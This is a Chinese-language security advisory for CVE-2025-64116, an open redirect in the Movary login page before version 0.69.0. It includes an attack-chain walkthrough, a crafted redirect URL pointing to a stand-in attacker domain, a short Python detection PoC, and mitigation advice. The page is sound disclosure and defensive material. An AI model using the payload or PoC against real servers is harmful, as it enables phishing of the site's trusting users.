CVE-2025-64116 Movary登录页面开放重定向漏洞

漏洞信息

漏洞编号

CVE-2025-64116

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Movary

漏洞概述

Movary是一款用于追踪、评分和浏览电影观看历史的Web应用程序。该应用在0.69.0之前的版本中存在一个开放重定向（Open Redirect）安全漏洞。漏洞位于登录页面，具体表现为登录页面接受一个redirect参数但未对其进行有效验证。攻击者可以构造恶意链接，利用该漏洞将已经登录的用户重定向到任意外部网站。此漏洞的潜在危害包括：钓鱼攻击，用户被重定向到仿冒网站后可能泄露敏感信息；信任链破坏，利用目标网站的信誉进行恶意活动；以及进一步的社会工程学攻击。由于该漏洞需要用户交互（点击恶意链接），因此CVSS评分相对较低，但仍需及时修复。

技术细节

漏洞根源在于Movary登录页面（login.php或等效路由）对redirect参数的处理缺乏安全验证。攻击者可以通过构造类似如下的URL来利用此漏洞：/login?redirect=https://evil.example.com。系统在接受redirect参数后，会在用户成功认证后直接将用户重定向到该外部URL，而不会检查目标域名是否为可信域名或内部域名。攻击者通常会结合钓鱼邮件或其他社会工程手段，诱导已登录用户点击此类恶意链接。由于用户已经登录，系统会自动完成认证流程，然后执行重定向操作，用户可能在不知情的情况下被带到恶意网站。该漏洞的CVSS向量显示攻击复杂度低（AC:L），无需特殊权限（PR:N），但需要用户交互（UI:R），通过网络可利用（AV:N），对机密性和完整性有低影响（C:L/I:L），对可用性无影响（A:N）。修复方案是在0.69.0版本中对该参数进行了验证或限制，仅允许重定向到内部相对路径。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站运行Movary应用且版本低于0.69.0

STEP 2

步骤2

攻击者构造恶意URL：/login?redirect=https://evil.example.com

STEP 3

步骤3

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导已登录用户点击该恶意链接

STEP 4

步骤4

用户访问恶意链接，系统完成认证（因用户已登录）

STEP 5

步骤5

系统在认证后执行重定向，将用户浏览器跳转到攻击者控制的外部网站

STEP 6

步骤6

用户在恶意网站上被诱导输入敏感信息或下载恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-64116 PoC - Movary Open Redirect Vulnerability
# Target: Movary < 0.69.0
# Attack Type: Open Redirect

def test_open_redirect(base_url):
    """
    Test for open redirect vulnerability in Movary login page
    """
    # Malicious redirect target
    malicious_domain = "https://evil.example.com/phishing"
    
    # Construct malicious URL
    vulnerable_url = f"{base_url}/login?redirect={malicious_domain}"
    
    print(f"[*] Testing vulnerable URL: {vulnerable_url}")
    
    try:
        # Send GET request to login page with redirect parameter
        response = requests.get(vulnerable_url, allow_redirects=False)
        
        # Check if redirect occurs
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location', '')
            print(f"[+] Found redirect to: {location}")
            
            if malicious_domain in location:
                print("[!] VULNERABLE: Open redirect confirmed!")
                return True
        
        print("[-] Not vulnerable or redirect not found")
        return False
        
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

# Example usage
if __name__ == "__main__":
    target = "http://target-movary-server.com"
    test_open_redirect(target)

影响范围

Movary < 0.69.0

防御指南

临时缓解措施

如果无法立即升级，可通过Web应用防火墙（WAF）规则暂时阻止包含外部域名的redirect参数，或在反向代理层配置重定向白名单策略。临时方案可能影响部分合法功能，建议尽快升级到修复版本。